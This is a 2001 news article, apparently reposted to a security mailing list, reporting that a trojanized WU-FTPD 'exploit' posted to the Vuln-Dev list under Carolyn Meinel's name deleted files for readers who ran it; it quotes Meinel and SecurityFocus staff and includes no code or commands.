http://www.newsbytes.com/news/01/170392.html 'Happy Hacker' Drops A Bomb On Security Experts By Brian McWilliams, Newsbytes CEDAR CREST, NEW MEXICO, U.S.A., 21 Sep 2001, 3:34 PM CST They operate in a shadowy online world where people often conceal their true identities through nicknames like Blue Boar, ObLiviON, and w1re p4ir. But sometimes even computer security experts get a brutal reminder: You can't always trust what you read on e-mail lists. And you certainly shouldn't put any faith in programs posted there. On Wednesday, the 5,000-strong subscribers to a popular security list known as Vuln-Dev received what may have appeared a rare treat: a message to the list containing source code to a program that gave the user full control of a remote Unix system. The message, apparently from Carolyn Meinel, a computer security consultant and author of a book called "The Happy Hacker," claimed the code exploited a vulnerability in the latest version of WU-FTPD, a file transfer program used by many sites around the world. A copy of the code, wu261.c, was also available at Meinel's site, techbroker.com. But as some Vuln-Dev readers, many of whom are system administrators for businesses, painfully learned, the program was a Trojan horse, and if compiled and run, could delete most of the files on the user's computer. List member Jason Parker told Newsbytes he glanced over the code before compiling it, decided it looked legitimate, and ran it Thursday on the test account of a system. "I lost everything in the home directory, including information I would rather not have lost, but that's the price you pay for trusting," said Parker, who has since replaced the front page of his site with an obscene comment about Meinel. But Meinel claims that she did not write the message containing the "exploit." Instead, she believes it was skillfully composed and mailed out by someone who hacked her site and had the ability to create files and send e-mail using her account. "Whoever did it is pretty darn good. This is not the work of your average script kiddie," Meinel told Newsbytes. A frequent target for attack by some security professionals who consider her a charlatan, Meinel suffered a similar site compromise in January. A group calling itself Girlies for Hacking defaced Meinel's site and posted the contents of her e-mail inbox on the Web. Meinel said she's not embarrassed by the latest security breach and is mainly concerned about the potential harm done to systems managed by Vuln-Dev readers. "This wasn't an attack on me. It was an attack on the Internet infrastructure," according to Meinel, who said she is working with a forensics expert to track down the perpetrators. The incident has aggravated officials at SecurityFocus, the security information and consulting firm that hosts and moderates the Vuln-Dev list. "Somebody went to a lot of effort to make us look like fools," said David Ahmad, threat analysis manager for SecurityFocus. According to Ahmad, pranksters often submit exploits with hidden malicious payloads to the company's numerous security discussion lists. List moderators review the postings and weed out the trash, but accidents happen, as was the case recently when a obfuscated program made it through to the firm's prestigious Bugtraq list, which has nearly 40,000 readers. That code secretly launched a denial of service attack on a nameserver operated by Network Associates. Ahmad said the attackers attempted to post the phony WU-FTPD exploit to Bugtraq Monday, but he became suspicious after skimming the code and blocked it from going through. But due to distractions from dealing with the Nimda worm, the attackers were able to slip the posting past moderators of Vuln-Dev a few days later, according to Ahmad. SecurityFocus has deleted the phony Meinel posting from the Web archive for Vuln-Dev. But while the code hasn't shown up yet in online libraries of hacking tools, its damage may not be done and there may be more hard lessons in store for curious hackers. "A remote exploit for the latest version of a common service is like a prize. Anyone who sees it will be tempted to download and run it," said Ahmad. Vuln-Dev is archived on the Web at http://www.securityfocus.com/templates/archive.pike?list=82 . A mirror of the January defacement of Techbroker.com is at http://www.attrition.org/mirror/attrition/2001/01/13/www.techbroker.com - ISN is currently hosted by Attrition.org To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY of the mail.
This archive was generated by hypermail 2b30 : Sat Sep 22 2001 - 04:37:34 PDT